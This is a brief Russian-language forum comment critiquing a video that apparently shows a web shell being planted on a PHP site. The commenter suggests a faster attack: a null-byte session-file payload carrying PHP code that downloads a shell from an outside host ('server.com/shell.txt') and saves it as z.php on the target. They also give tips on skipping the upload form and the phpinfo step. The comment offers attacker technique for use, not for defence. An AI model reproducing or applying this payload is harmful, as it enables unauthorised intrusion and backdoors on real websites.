Даа жесть. Видео, конечно, интересное
Но. Полчаса лить шелл, это что-то. На середине видео я уже еле сдерживался, чтоб не закрыть плеер и не пойти критиковать
Во-первых, зачем ты в опере смотришь куки ТАКИМ образом? Это дико тормозно и медленно, проще жать ПКМ -> настройки для сайта -> Cookie (таким образом, опера не читают куки всех доменов, а только домена, на котором ты находишься сейчас.)
Во-вторых, magic quotes on там - но в скрипте скорей всего просто stripslashes делается, так что ничего странного нет.
В-третьих, зачем вводить cmd переменную? Тем более проверять ее существование isset-ом (ты же не будешь сначала пустой запрос слать, а сразу с кодом твоим). Эта переменная не нужна там совершенно, можно было банально сделать:
sess_[номер сессии]%00<?php copy('http://server.com/shell.txt', '../media/z.php');?>
И по этой причине html-форму какую-то выдумывать и через нее аплоадить шелл не пришлось бы.
phpinfo и абсолютный путь смотреть тоже, в принципе не обязательно было.